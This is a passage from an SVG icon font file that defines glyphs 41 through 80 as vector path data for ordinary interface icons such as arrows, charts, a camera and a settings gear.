l110 110q14 14 28.5 -0.5t0.5 -28.5z" />
    <glyph glyph-name="glyph41" unicode="&#xe029;" horiz-adv-x="832" 
d="M728 592q43 0 73.5 -30.5t30.5 -73.5v-417q0 -43 -30.5 -73.5t-73.5 -30.5h-417q-40 0 -82.5 22t-65.5 54l-159 222q-10 14 0 28q27 37 79.5 111t78.5 111q23 32 66 54.5t83 22.5h417zM632 184l-95 95l95 96q12 12 12 29.5t-12 29.5t-29.5 12t-29.5 -12l-95 -96l-96 96
q-12 12 -29.5 12t-29.5 -12t-12 -29.5t12 -29.5l96 -96l-96 -95q-12 -12 -12 -29.5t12 -29.5q13 -13 30 -13q16 0 29 13l96 95l95 -95q13 -13 30 -13q16 0 29 13q12 12 12 29.5t-12 29.5z" />
    <glyph glyph-name="glyph42" unicode="&#xe02a;" horiz-adv-x="792" 
d="M125 383h458v-250h-458v250zM368 179l132 97l-108 -18l-49 79l-135 -97l110 18zM708 383q35 0 59.5 -24.5t24.5 -58.5v-83q0 -35 -25 -59.5t-59 -24.5q0 -52 -36.5 -88.5t-88.5 -36.5h-458q-52 0 -88.5 36.5t-36.5 88.5v250q0 52 36.5 88.5t88.5 36.5h458
q52 0 88.5 -36.5t36.5 -88.5zM625 133v250q0 17 -12.5 29.5t-29.5 12.5h-458q-17 0 -29.5 -12.5t-12.5 -29.5v-250q0 -17 12.5 -29t29.5 -12h458q17 0 29.5 12t12.5 29z" />
    <glyph glyph-name="glyph43" unicode="&#xe02b;" horiz-adv-x="792" 
d="M292 133q-17 0 -29.5 12.5t-12.5 29.5v167q0 17 12.5 29t29.5 12t29 -12t12 -29v-167q0 -17 -12 -29.5t-29 -12.5zM167 133q-17 0 -29.5 12.5t-12.5 29.5v167q0 17 12.5 29t29.5 12t29 -12t12 -29v-167q0 -17 -12 -29.5t-29 -12.5zM542 133q-17 0 -29.5 12.5t-12.5 29.5
v167q0 17 12.5 29t29.5 12t29 -12t12 -29v-167q0 -17 -12 -29.5t-29 -12.5zM417 133q-17 0 -29.5 12.5t-12.5 29.5v167q0 17 12.5 29t29.5 12t29 -12t12 -29v-167q0 -17 -12 -29.5t-29 -12.5zM708 383q35 0 59.5 -24.5t24.5 -58.5v-83q0 -35 -25 -59.5t-59 -24.5
q0 -52 -36.5 -88.5t-88.5 -36.5h-458q-52 0 -88.5 36.5t-36.5 88.5v250q0 52 36.5 88.5t88.5 36.5h458q52 0 88.5 -36.5t36.5 -88.5zM625 133v250q0 17 -12.5 29.5t-29.5 12.5h-458q-17 0 -29.5 -12.5t-12.5 -29.5v-250q0 -17 12.5 -29t29.5 -12h458q17 0 29.5 12t12.5 29z
" />
    <glyph glyph-name="glyph44" unicode="&#xe02c;" horiz-adv-x="792" 
d="M292 133q-17 0 -29.5 12.5t-12.5 29.5v167q0 17 12.5 29t29.5 12t29 -12t12 -29v-167q0 -17 -12 -29.5t-29 -12.5zM167 133q-17 0 -29.5 12.5t-12.5 29.5v167q0 17 12.5 29t29.5 12t29 -12t12 -29v-167q0 -17 -12 -29.5t-29 -12.5zM417 133q-17 0 -29.5 12.5t-12.5 29.5
v167q0 17 12.5 29t29.5 12t29 -12t12 -29v-167q0 -17 -12 -29.5t-29 -12.5zM708 383q35 0 59.5 -24.5t24.5 -58.5v-83q0 -35 -25 -59.5t-59 -24.5q0 -52 -36.5 -88.5t-88.5 -36.5h-458q-52 0 -88.5 36.5t-36.5 88.5v250q0 52 36.5 88.5t88.5 36.5h458q52 0 88.5 -36.5
t36.5 -88.5zM625 133v250q0 17 -12.5 29.5t-29.5 12.5h-458q-17 0 -29.5 -12.5t-12.5 -29.5v-250q0 -17 12.5 -29t29.5 -12h458q17 0 29.5 12t12.5 29z" />
    <glyph glyph-name="glyph45" unicode="&#xe02d;" horiz-adv-x="792" 
d="M167 133q-17 0 -29.5 12.5t-12.5 29.5v167q0 17 12.5 29t29.5 12t29 -12t12 -29v-167q0 -17 -12 -29.5t-29 -12.5zM708 383q35 0 59.5 -24.5t24.5 -58.5v-83q0 -35 -25 -59.5t-59 -24.5q0 -52 -36.5 -88.5t-88.5 -36.5h-458q-52 0 -88.5 36.5t-36.5 88.5v250
q0 52 36.5 88.5t88.5 36.5h458q52 0 88.5 -36.5t36.5 -88.5zM625 133v250q0 17 -12.5 29.5t-29.5 12.5h-458q-17 0 -29.5 -12.5t-12.5 -29.5v-250q0 -17 12.5 -29t29.5 -12h458q17 0 29.5 12t12.5 29z" />
    <glyph glyph-name="glyph46" unicode="&#xe02e;" horiz-adv-x="792" 
d="M292 133q-17 0 -29.5 12.5t-12.5 29.5v167q0 17 12.5 29t29.5 12t29 -12t12 -29v-167q0 -17 -12 -29.5t-29 -12.5zM167 133q-17 0 -29.5 12.5t-12.5 29.5v167q0 17 12.5 29t29.5 12t29 -12t12 -29v-167q0 -17 -12 -29.5t-29 -12.5zM708 383q35 0 59.5 -24.5t24.5 -58.5
v-83q0 -35 -25 -59.5t-59 -24.5q0 -52 -36.5 -88.5t-88.5 -36.5h-458q-52 0 -88.5 36.5t-36.5 88.5v250q0 52 36.5 88.5t88.5 36.5h458q52 0 88.5 -36.5t36.5 -88.5zM625 133v250q0 17 -12.5 29.5t-29.5 12.5h-458q-17 0 -29.5 -12.5t-12.5 -29.5v-250q0 -17 12.5 -29
t29.5 -12h458q17 0 29.5 12t12.5 29z" />
    <glyph glyph-name="glyph47" unicode="&#xe02f;" horiz-adv-x="629" 
d="M625 100q15 -54 -17 -93.5t-85 -39.5h-417q-53 0 -85 39.5t-17 93.5l103 380q2 8 5 28h-48q-17 0 -29 12.5t-12 29.5t12 29.5t29 12.5h500q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29.5t-29.5 -12.5h-49zM428 508h-233q-1 -28 -8 -49l-43 -160l4 1h333l4 -1zM523 50
q28 0 21 28l-50 185q-7 -5 -13 -5h-333q-7 0 -14 5l-49 -185q-7 -28 21 -28h417z" />
    <glyph glyph-name="glyph48" unicode="&#xe030;" horiz-adv-x="708" 
d="M208 112q0 -8 -6 -14t-14 -6t-14.5 6t-6.5 14v250q0 8 6.5 14.5t14.5 6.5t14 -6.5t6 -14.5v-250zM292 112q0 -8 -6.5 -14t-14.5 -6t-14.5 6t-6.5 14v250q0 8 6.5 14.5t14.5 6.5t14.5 -6.5t6.5 -14.5v-250zM375 112q0 -8 -6.5 -14t-14.5 -6t-14.5 6t-6.5 14v250
q0 8 6.5 14.5t14.5 6.5t14.5 -6.5t6.5 -14.5v-250zM562 550q60 0 103 -43t43 -103v-208q0 -60 -43 -103t-103 -43h-20q0 -52 -36.5 -88.5t-88.5 -36.5h-292q-52 0 -88.5 36.5t-36.5 88.5v542q0 34 24 58.5t59 24.5h375q35 0 59.5 -24.5t24.5 -58.5v-42h20zM83 592v-63
q0 -25 18.5 -43.5t44.5 -18.5q36 0 54 32l7 13l15 -3q14 -2 27.5 5.5t18.5 21.5l5 14h185v42h-375zM458 50v458h-157q-25 -41 -72 -41q-32 -42 -83 -42q-36 0 -63 21v-396q0 -17 12.5 -29.5t29.5 -12.5h292q17 0 29 12.5t12 29.5zM625 196v208q0 26 -18.5 44.5t-44.5 18.5
h-62v-334h62q26 0 44.5 18.5t18.5 44.5z" />
    <glyph glyph-name="glyph49" unicode="&#xe031;" horiz-adv-x="666" 
d="M655 79q19 -21 7.5 -46t-37.5 -25h-131q-14 -55 -59 -90t-102 -35t-101.5 35t-58.5 90h-131q-26 0 -38 26t8 46q3 3 8 9.5t17 29.5t21.5 50.5t17.5 74t8 98.5q0 81 46.5 145.5t120.5 90.5l-1 14q0 34 24 58.5t59 24.5t59.5 -24.5t24.5 -58.5l-2 -14q74 -26 121 -90.5
t47 -145.5q0 -52 8 -98.5t17.5 -74.5t21.5 -50.5t17 -29.5t8 -10zM333 508q-69 0 -117.5 -48.5t-48.5 -117.5q0 -49 -4 -84h341q-5 43 -5 84q0 69 -49 117.5t-117 48.5zM333 -33q49 0 72 41h-143q23 -41 71 -41zM117 92h433q-25 52 -39 125h-355q-14 -73 -39 -125z" />
    <glyph glyph-name="glyph50" unicode="&#xe032;" 
d="M625 675q52 0 88.5 -36.5t36.5 -88.5v-417q0 -52 -30 -88.5t-74 -36.5h-28q-13 -36 -45.5 -59.5t-72.5 -23.5h-375q-52 0 -88.5 36.5t-36.5 88.5v458q0 16 12 30l125 125q12 12 30 12h458zM125 8h42v459h-84v-417q0 -17 12.5 -29.5t29.5 -12.5zM542 50v375
q0 17 -12.5 29.5t-29.5 12.5h-292v-459h292q17 0 29.5 12.5t12.5 29.5zM667 133v417q0 17 -12.5 29.5t-29.5 12.5h-441l-42 -42h358q52 0 88.5 -36.5t36.5 -88.5v-333h21q6 0 13.5 11.5t7.5 29.5z" />
    <glyph glyph-name="glyph51" unicode="&#xe033;" horiz-adv-x="583" 
d="M458 717q52 0 88.5 -36.5t36.5 -88.5v-584q0 -41 -19.5 -62.5t-46.5 -21.5q-34 0 -64 30l-132 133q-12 12 -29.5 12t-29.5 -12l-132 -133q-32 -31 -65.5 -30t-51.5 31q-13 23 -13 53v584q0 52 36.5 88.5t88.5 36.5h333zM125 633q-17 0 -29.5 -12t-12.5 -29v-413l102 94
q44 41 106.5 41t106.5 -41l102 -94v413q0 17 -12.5 29t-29.5 12h-333zM380 146l120 -120v96l-130 120q-32 29 -78 29t-78 -29l-131 -120v-96l120 120q36 36 89 36q52 0 88 -36z" />
    <glyph glyph-name="glyph52" unicode="&#xe034;" 
d="M625 508q52 0 88.5 -36.5t36.5 -88.5v-291q0 -52 -36.5 -88.5t-88.5 -36.5h-500q-52 0 -88.5 36.5t-36.5 88.5v291q0 52 36.5 88.5t88.5 36.5q0 52 36.5 88.5t88.5 36.5h250q52 0 88.5 -36.5t36.5 -88.5zM250 550q-17 0 -29.5 -12.5t-12.5 -29.5h334q0 17 -12.5 29.5
t-29.5 12.5h-250zM667 92v41h-584v-41q0 -17 12.5 -29.5t29.5 -12.5h500q17 0 29.5 12.5t12.5 29.5zM83 175h584v208q0 17 -12.5 29.5t-29.5 12.5h-500q-17 0 -29.5 -12.5t-12.5 -29.5v-208zM417 300q17 0 29 -12.5t12 -29.5t-12 -29t-29 -12h-84q-17 0 -29 12t-12 29
t12 29.5t29 12.5h84z" />
    <glyph glyph-name="glyph53" unicode="&#xe035;" horiz-adv-x="752" 
d="M727 641q39 -39 19 -90q-108 -271 -390 -438q-13 -8 -23 -10q-13 -83 -75.5 -136.5t-147.5 -53.5q-19 0 -37 3l-61 9l-9 61q-16 101 44 178q54 69 144 83q4 14 8 22q167 282 438 390q15 6 31 6q35 0 59 -24zM110 -3q57 0 97 35.5t46 90.5l-43 43q-62 -7 -98.5 -55
t-26.5 -113q8 -1 25 -1zM314 184q30 17 74 49q-67 67 -68 69q-28 -39 -49 -75zM422 258q170 132 247 324q-194 -77 -325 -248z" />
    <glyph glyph-name="glyph54" unicode="&#xe036;" horiz-adv-x="917" 
d="M792 -33h-667q-52 0 -88.5 36.5t-36.5 88.5v416q0 52 36.5 88.5t88.5 36.5h667q52 0 88.5 -36.5t36.5 -88.5v-416q0 -52 -36.5 -88.5t-88.5 -36.5zM125 550q-17 0 -29.5 -12.5t-12.5 -29.5v-416q0 -17 12.5 -29.5t29.5 -12.5h667q17 0 29 12.5t12 29.5v416q0 17 -12 29.5
t-29 12.5h-667zM375 175h-167q-17 0 -29 12.5t-12 29.5t12 29t29 12h167q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5zM375 342h-167q-17 0 -29 12t-12 29t12 29.5t29 12.5h167q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12zM542 362q0 84 83 84t83 -84
q0 -83 -83 -83t-83 83zM625 244q45 0 74.5 -18t29.5 -42q0 -12 -30 -21t-74 -9q-47 0 -75.5 9t-28.5 21q0 24 28.5 42t75.5 18z" />
    <glyph glyph-name="glyph55" unicode="&#xe037;" horiz-adv-x="583" 
d="M458 -75h-333q-53 0 -89 36t-36 89v500q0 53 36 89t89 36h333q53 0 89 -36t36 -89v-500q0 -53 -36 -89t-89 -36zM125 592q-19 0 -30.5 -11.5t-11.5 -30.5v-500q0 -19 11.5 -30.5t30.5 -11.5h333q19 0 30.5 11.5t11.5 30.5v500q0 19 -11.5 30.5t-30.5 11.5h-333zM125 342
q0 41 42 41q41 0 41 -41q0 -42 -41 -42q-42 0 -42 42zM250 342q0 41 42 41q41 0 41 -41q0 -42 -41 -42q-42 0 -42 42zM375 342q0 41 42 41q41 0 41 -41q0 -42 -41 -42q-42 0 -42 42zM125 217q0 41 42 41q41 0 41 -41q0 -42 -41 -42q-42 0 -42 42zM250 217q0 41 42 41
q41 0 41 -41q0 -42 -41 -42q-42 0 -42 42zM375 217q0 41 42 41q41 0 41 -41q0 -42 -41 -42q-42 0 -42 42zM125 92q0 41 42 41q41 0 41 -41q0 -42 -41 -42q-42 0 -42 42zM250 92q0 41 42 41q41 0 41 -41q0 -42 -41 -42q-42 0 -42 42zM375 92q0 41 42 41q41 0 41 -41
q0 -42 -41 -42q-42 0 -42 42zM417 508h-250v-41h250v41zM458 550v-125h-333v125h333z" />
    <glyph glyph-name="glyph56" unicode="&#xe038;" 
d="M667 542q37 -13 60 -45t23 -72v-375q0 -52 -36.5 -88.5t-88.5 -36.5h-500q-52 0 -88.5 36.5t-36.5 88.5v375q0 40 23 72t60 45v8q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5h84q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5v-8zM500 550v-83q0 -17 12.5 -29.5
t29.5 -12.5t29 12.5t12 29.5v83q0 17 -12 29.5t-29 12.5t-29.5 -12.5t-12.5 -29.5zM167 550v-83q0 -17 12 -29.5t29 -12.5t29.5 12.5t12.5 29.5v83q0 17 -12.5 29.5t-29.5 12.5t-29 -12.5t-12 -29.5zM667 50v250h-584v-250q0 -17 12.5 -29.5t29.5 -12.5h500q17 0 29.5 12.5
t12.5 29.5zM667 342v83q0 17 -12.5 29.5t-29.5 12.5q0 -35 -24.5 -59.5t-58.5 -24.5t-59 24.5t-25 59.5h-166q0 -35 -25 -59.5t-59 -24.5t-58.5 24.5t-24.5 59.5q-17 0 -29.5 -12.5t-12.5 -29.5v-83h584z" />
    <glyph glyph-name="glyph57" unicode="&#xe039;" 
d="M667 542q37 -13 60 -45t23 -72v-375q0 -52 -36.5 -88.5t-88.5 -36.5h-500q-52 0 -88.5 36.5t-36.5 88.5v375q0 40 23 72t60 45v8q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5h84q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5v-8zM500 550v-83q0 -17 12.5 -29.5
t29.5 -12.5t29 12.5t12 29.5v83q0 17 -12 29.5t-29 12.5t-29.5 -12.5t-12.5 -29.5zM167 550v-83q0 -17 12 -29.5t29 -12.5t29.5 12.5t12.5 29.5v83q0 17 -12.5 29.5t-29.5 12.5t-29 -12.5t-12 -29.5zM667 50v250h-584v-250q0 -17 12.5 -29.5t29.5 -12.5h500q17 0 29.5 12.5
t12.5 29.5z" />
    <glyph glyph-name="glyph58" unicode="&#xe03a;" horiz-adv-x="833" 
d="M708 -33h-583q-52 0 -88.5 36.5t-36.5 88.5v333q0 52 36.5 88.5t88.5 36.5h66l42 42q18 18 46 29.5t54 11.5h167q26 0 54.5 -11.5t46.5 -29.5l41 -42h66q52 0 88.5 -36.5t36.5 -88.5v-333q0 -52 -36.5 -88.5t-88.5 -36.5zM125 467q-17 0 -29.5 -12.5t-12.5 -29.5v-333
q0 -17 12.5 -29.5t29.5 -12.5h583q17 0 29.5 12.5t12.5 29.5v333q0 17 -12.5 29.5t-29.5 12.5h-83q-17 0 -29 12l-54 54q-17 17 -42 17h-167q-24 0 -41 -17l-54 -54q-12 -12 -30 -12h-83zM417 383q-43 0 -74 -30.5t-31 -73.5t31 -73.5t74 -30.5t73.5 30.5t30.5 73.5
t-30.5 73.5t-73.5 30.5zM417 425q61 0 103 -42.5t42 -103.5q0 -60 -42.5 -103t-102.5 -43q-61 0 -103.5 43t-42.5 103q0 61 42.5 103.5t103.5 42.5zM667 438q22 0 38 -16t16 -39t-15.5 -38.5t-38.5 -15.5t-39 16t-16 38q0 23 16 39t39 16z" />
    <glyph glyph-name="glyph59" unicode="&#xe03b;" horiz-adv-x="833" 
d="M708 550q52 0 88.5 -36.5t36.5 -88.5v-333q0 -52 -36.5 -88.5t-88.5 -36.5h-583q-52 0 -88.5 36.5t-36.5 88.5v333q0 52 36.5 88.5t88.5 36.5h66l42 42q18 18 46 29.5t54 11.5h167q26 0 54.5 -11.5t46.5 -29.5l41 -42h66zM417 133q60 0 102.5 43t42.5 103q0 61 -42 103.5
t-103 42.5t-103.5 -42.5t-42.5 -103.5q0 -60 42.5 -103t103.5 -43zM667 329q23 0 38.5 15.5t15.5 38.5t-16 39t-38 16q-23 0 -39 -16t-16 -39q0 -22 16 -38t39 -16z" />
    <glyph glyph-name="glyph60" unicode="&#xe03c;" horiz-adv-x="708" 
d="M354 -54q-146 0 -250 104t-104 250t104 250t250 104t250 -104t104 -250t-104 -250t-250 -104zM354 571q-112 0 -191.5 -79.5t-79.5 -191.5t79.5 -191.5t191.5 -79.5t191.5 79.5t79.5 191.5t-79.5 191.5t-191.5 79.5zM354 446q-17 0 -25 -2l169 -170q2 8 2 26
q0 60 -43 103t-103 43zM354 488q77 0 132.5 -55.5t55.5 -132.5q0 -52 -29 -99l-258 257q48 30 99 30zM211 326q-3 -12 -3 -26q0 -60 43 -103t103 -43q18 0 26 2zM196 400l258 -258q-48 -30 -100 -30q-78 0 -132.5 55t-54.5 133q0 53 29 100z" />
    <glyph glyph-name="glyph61" unicode="&#xe03d;" horiz-adv-x="667" 
d="M333 633q138 0 236 -97.5t98 -235.5t-98 -235.5t-236 -97.5t-235.5 97.5t-97.5 235.5t97.5 235.5t235.5 97.5zM125 300q0 -86 61 -147t147 -61q50 0 96 24l-280 280q-24 -46 -24 -96zM517 204q25 48 25 96q0 86 -61.5 147t-147.5 61q-49 0 -95 -24z" />
    <glyph glyph-name="glyph62" unicode="&#xe03e;" 
d="M625 675q52 0 88.5 -37.5t36.5 -87.5v-417q0 -17 -12.5 -29t-29.5 -12h-666q-17 0 -29.5 12t-12.5 29v125q0 45 27 78l167 209q31 38 82.5 44.5t90.5 -22.5l69 -53l92 114q38 47 97 47zM667 550q0 16 -13 29t-29 13q-20 0 -33 -16l-116 -145q-11 -14 -27 -16t-30 8
l-102 77q-13 10 -30.5 8t-27.5 -15l-167 -209q-9 -11 -9 -26v-83h584v375zM708 -75h-666q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12h666q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5z" />
    <glyph glyph-name="glyph63" unicode="&#xe03f;" 
d="M708 550v-417h-666v125q0 30 18 52l167 209q21 26 54.5 30t60.5 -16l102 -76l116 145q22 27 56 31t61 -18q31 -24 31 -65zM708 8q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5h-666q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12h666z" />
    <glyph glyph-name="glyph64" unicode="&#xe040;" horiz-adv-x="667" 
d="M542 592q52 0 88.5 -36.5t36.5 -88.5v-375h-667v250q0 52 36.5 88.5t88.5 36.5q47 0 83 -33v199q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5v-74q36 33 84 33zM333 675q-17 0 -29 -12.5t-12 -29.5v-458h83v458q0 17 -12.5 29.5t-29.5 12.5zM167 175v167
q0 17 -12.5 29t-29.5 12t-29.5 -12t-12.5 -29v-167h84zM583 175v292q0 17 -12 29t-29 12t-29.5 -12t-12.5 -29v-292h83zM625 -75h-583q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12h583q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5z" />
    <glyph glyph-name="glyph65" unicode="&#xe041;" horiz-adv-x="667" 
d="M417 633v-500h-167v500q0 35 24.5 59.5t58.5 24.5q35 0 59.5 -24.5t24.5 -59.5zM625 467v-334h-167v334q0 34 24.5 58.5t59.5 24.5q34 0 58.5 -24t24.5 -59zM208 342v-209h-166v209q0 34 24 58.5t59 24.5t59 -24.5t24 -58.5zM625 8q17 0 29.5 -12t12.5 -29t-12.5 -29.5
t-29.5 -12.5h-583q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12h583z" />
    <glyph glyph-name="glyph66" unicode="&#xe042;" 
d="M125 92q-37 0 -67.5 20.5t-45 50t-12 66t26.5 66.5l167 208q31 38 82.5 45t90.5 -23l69 -52l91 113q38 47 98 47q50 0 86 -34.5t39 -79.5t-27 -89l-167 -208q-31 -38 -82 -44.5t-91 22.5l-70 52l-91 -113q-38 -47 -97 -47zM292 467q-20 0 -33 -16l-167 -208
q-16 -22 -3.5 -45t36.5 -23q20 0 33 16l141 177l134 -101q13 -10 30.5 -8t27.5 15l167 208q16 22 3.5 45t-36.5 23q-20 0 -33 -16l-141 -176l-134 100q-10 9 -25 9zM667 -75h-584q-17 0 -29 12.5t-12 29.5t12 29t29 12h584q17 0 29 -12t12 -29t-12 -29.5t-29 -12.5z" />
    <glyph glyph-name="glyph67" unicode="&#xe043;" horiz-adv-x="667" 
d="M31 152q-27 22 -31 56t18 61l167 208q21 26 54.5 30.5t60.5 -15.5l102 -77l116 145q22 27 56 31t61 -18t31 -56t-18 -61l-166 -208q-21 -26 -54.5 -30.5t-60.5 15.5l-102 77l-117 -145q-24 -32 -65 -32q-28 0 -52 19zM42 -75q-17 0 -29.5 12.5t-12.5 29.5t12.5 29
t29.5 12h583q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5h-583z" />
    <glyph glyph-name="glyph68" unicode="&#xe044;" horiz-adv-x="722" 
d="M264 675q0 34 24.5 58.5t58.5 24.5h8q174 -15 311 -129q27 -23 29.5 -59.5t-23.5 -63.5l-24 -23q74 -108 74 -238q0 -147 -92 -262q-24 -29 -65 -31q-19 0 -37 9q-86 -56 -185 -56q-142 0 -242.5 101t-100.5 243q0 119 74.5 212.5t189.5 120.5v93zM343 -12q85 0 155 52
l-192 198v267q-95 -14 -159 -86.5t-64 -169.5q0 -108 76.5 -184.5t183.5 -76.5zM347 299l265 266q-116 97 -265 110v-376zM356 246l209 -211q74 93 74 210q0 118 -74 211z" />
    <glyph glyph-name="glyph69" unicode="&#xe045;" horiz-adv-x="675" 
d="M359 218l234 234q82 -103 82 -235q0 -109 -58 -200q-9 -14 -25.5 -15.5t-28.5 10.5zM250 200l216 -217q-77 -58 -174 -58q-121 0 -206.5 86t-85.5 207q0 110 72 192t178 97v-307zM555 541l-222 -223v315q0 17 12.5 28t29.5 8q98 -18 177 -73q14 -10 14.5 -26.5
t-11.5 -28.5z" />
    <glyph glyph-name="glyph70" unicode="&#xe046;" horiz-adv-x="510" 
d="M510 92q0 -51 -37 -88t-88 -37q-52 0 -88 36l-297 297l297 297q35 35 88.5 35t88.5 -35q36 -36 36 -89q0 -52 -36 -88l-120 -120l120 -120q36 -36 36 -88zM118 300l238 -238q12 -12 29.5 -12t29.5 12t12 30q0 17 -12 29l-179 179l179 179q12 12 12 29q0 18 -12 30
t-29.5 12t-29.5 -12z" />
    <glyph glyph-name="glyph71" unicode="&#xe047;" horiz-adv-x="410" 
d="M385 567q25 -25 25 -59t-25 -59l-149 -149l149 -149q25 -25 25 -59t-25 -59t-59 -25t-59 25l-267 267l267 267q24 25 59 25t59 -25z" />
    <glyph glyph-name="glyph72" unicode="&#xe048;" horiz-adv-x="510" 
d="M125 -33q-51 0 -88 37t-37 88t37 88l120 120l-120 120q-37 37 -37 88q0 52 37 89q35 35 88 35t88 -35l297 -297l-297 -297q-36 -36 -88 -36zM125 550q-17 0 -29.5 -12.5t-12.5 -29.5q0 -16 13 -29l178 -179l-178 -179q-13 -13 -13 -29q0 -17 13 -30q12 -12 29 -12t29 12
l238 238l-238 238q-12 12 -29 12z" />
    <glyph glyph-name="glyph73" unicode="&#xe049;" horiz-adv-x="410" 
d="M24 567q24 25 59 25t59 -25l268 -267l-268 -267q-25 -25 -59 -25t-59 25t-25 59t25 59l150 149l-150 149q-25 25 -25 59t25 59z" />
    <glyph glyph-name="glyph74" unicode="&#xe04a;" horiz-adv-x="667" 
d="M542 675q52 0 88.5 -36.5t36.5 -88.5v-500q0 -52 -36.5 -88.5t-88.5 -36.5h-417q-52 0 -88.5 36.5t-36.5 88.5v500q0 52 36.5 88.5t88.5 36.5h417zM208 592v-42q0 -17 12.5 -29.5t29.5 -12.5h167q17 0 29 12.5t12 29.5v42h-250zM583 50v500q0 17 -12 29.5t-29 12.5h-42
v-42q0 -34 -24 -58.5t-59 -24.5h-167q-34 0 -58.5 24.5t-24.5 58.5v42h-42q-17 0 -29.5 -12.5t-12.5 -29.5v-500q0 -17 12.5 -29.5t29.5 -12.5h417q17 0 29 12.5t12 29.5zM500 92h-333q-21 0 -21 20q0 9 6 15t15 6h333q9 0 15 -6t6 -15q0 -20 -21 -20zM500 217h-333
q-9 0 -15 6t-6 15q0 20 21 20h333q21 0 21 -20q0 -9 -6 -15t-15 -6zM500 342h-333q-21 0 -21 20q0 9 6 15t15 6h333q9 0 15 -6t6 -15q0 -20 -21 -20z" />
    <glyph glyph-name="glyph75" unicode="&#xe04b;" horiz-adv-x="833" 
d="M625 425q86 0 147 -61t61 -147t-61 -147.5t-147 -61.5h-167v191l54 -53q13 -13 30 -13q16 0 29 13q12 12 12 29t-12 29l-125 125q-11 11 -29 11.5t-30 -11.5l-125 -125q-12 -12 -12 -29t12 -29q13 -13 30 -13q16 0 29 13l54 53v-191h-208q-69 0 -118 49t-49 118
q0 58 35 102.5t90 58.5v6q0 104 73.5 177t176.5 73q80 0 144.5 -46.5t90.5 -121.5z" />
    <glyph glyph-name="glyph76" unicode="&#xe054;" horiz-adv-x="844" 
d="M635 425q86 0 147.5 -61t61.5 -147t-61.5 -147.5t-147.5 -61.5h-458q-70 0 -123.5 49.5t-53.5 117.5q0 53 38 98t77 63v6q0 103 78 176.5t182 73.5q82 0 151.5 -47t94.5 -121zM635 92q52 0 88.5 36.5t36.5 88.5t-36 88.5t-88 36.5q-14 0 -34 -6l-45 -12l-8 45
q-11 60 -57 99.5t-107 39.5q-69 0 -117.5 -48.5t-48.5 -117.5q0 -18 3 -34l10 -50l-59 1q-32 0 -55.5 -25t-23.5 -59q0 -35 24 -59t59 -24h229v158l-89 -90q-6 -6 -15 -6q-13 0 -19 13t4 23l125 125q15 9 30 0l125 -125q10 -10 4 -23t-19 -13q-9 0 -15 6l-89 90v-158h187z
" />
    <glyph glyph-name="glyph77" unicode="&#xe04c;" horiz-adv-x="951" 
d="M302 8q-52 0 -89 37l-213 213l213 214q35 35 88.5 35t88.5 -35q37 -37 37 -88.5t-37 -88.5l-36 -37l36 -36q37 -37 37 -88.5t-37 -88.5t-88 -37zM118 258l154 -154q12 -12 29.5 -12t29.5 12t12 29.5t-12 29.5l-95 95l95 96q12 12 12 29.5t-12 29.5t-29.5 12t-29.5 -12z
M649 8q-51 0 -88 37t-37 88.5t37 88.5l37 36l-37 37q-37 37 -37 88.5t37 88.5q35 35 88.5 35t88.5 -35l213 -214l-213 -213q-37 -37 -89 -37zM649 425q-17 0 -29 -12t-12 -29.5t12 -29.5l95 -96l-95 -95q-12 -12 -12 -29.5t12 -29.5t29.5 -12t29.5 12l154 154l-154 155
q-12 12 -30 12z" />
    <glyph glyph-name="glyph78" unicode="&#xe04d;" horiz-adv-x="805" 
d="M243 50q-35 0 -59 24l-184 184l184 184q25 25 59.5 25t58.5 -25q25 -25 25 -59t-25 -59l-66 -66l66 -66q25 -25 25 -59t-25 -59q-24 -24 -59 -24zM562 50q-35 0 -59 24q-25 25 -25 59t25 59l66 66l-66 66q-25 25 -25 59t25 59q24 25 58.5 25t59.5 -25l184 -184l-184 -184
q-24 -24 -59 -24z" />
    <glyph glyph-name="glyph79" unicode="&#xe04e;" horiz-adv-x="708" 
d="M542 8h-500q-17 0 -29.5 12.5t-12.5 29.5t12.5 29.5t29.5 12.5h500q17 0 29 -12.5t12 -29.5t-12 -29.5t-29 -12.5zM562 592q60 0 103 -43t43 -103t-43 -103t-103 -43h-20v-83q0 -35 -25 -59.5t-59 -24.5h-333q-34 0 -58.5 24.5t-24.5 59.5v375h520zM458 217v291h-333
v-291h333zM562 383q26 0 44.5 18.5t18.5 44.5q0 25 -18.5 43.5t-44.5 18.5h-62v-125h62z" />
    <glyph glyph-name="glyph80" unicode="&#xe04f;" horiz-adv-x="770" 
d="M448 592h-125l-36 -143l-141 41l-63 -109l106 -102l-106 -102l63 -108l141 40l36 -142h125l35 142l142 -40l62 108l-106 102l106 102l-62 109l-142 -41zM448 675q28 0 50.5 -17.5t29.5 -45.5l15 -59l59 17q12 3 23 3q48 0 72 -42l62 -108q14 -25 10.5 -53t-24.5 -48
l-44 -43l44 -42q20 -20 24 -48t-10 -53l-62 -109q-24 -41 -72 -41q-11 0 -23 3l-59 16l-14 -59q-7 -28 -29.5 -45.5t-51.5 -17.5h-125q-29 0 -51.5 17.5t-29.5 45.5l-15 59l-58 -17q-12 -3 -23 -3q-48 0 -72 42l-63 108q-14 25 -10.5 53.5t24.5 48.5l44 42l-44 42
q-20 20 -24 48.5t10 53.5l63 108q24 42 72 42q11 0 23 -3l58 -17l15 59q7 28 29.5 45.5t51.5 17.5h125zM385 362q-35 0 -59 -24t-24 -59t24 -59t59 -24t59.5 24.5t24.5 58.5t-24.5 58.5t-59.5 24.5zM385 404q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5t-88.5 36.5
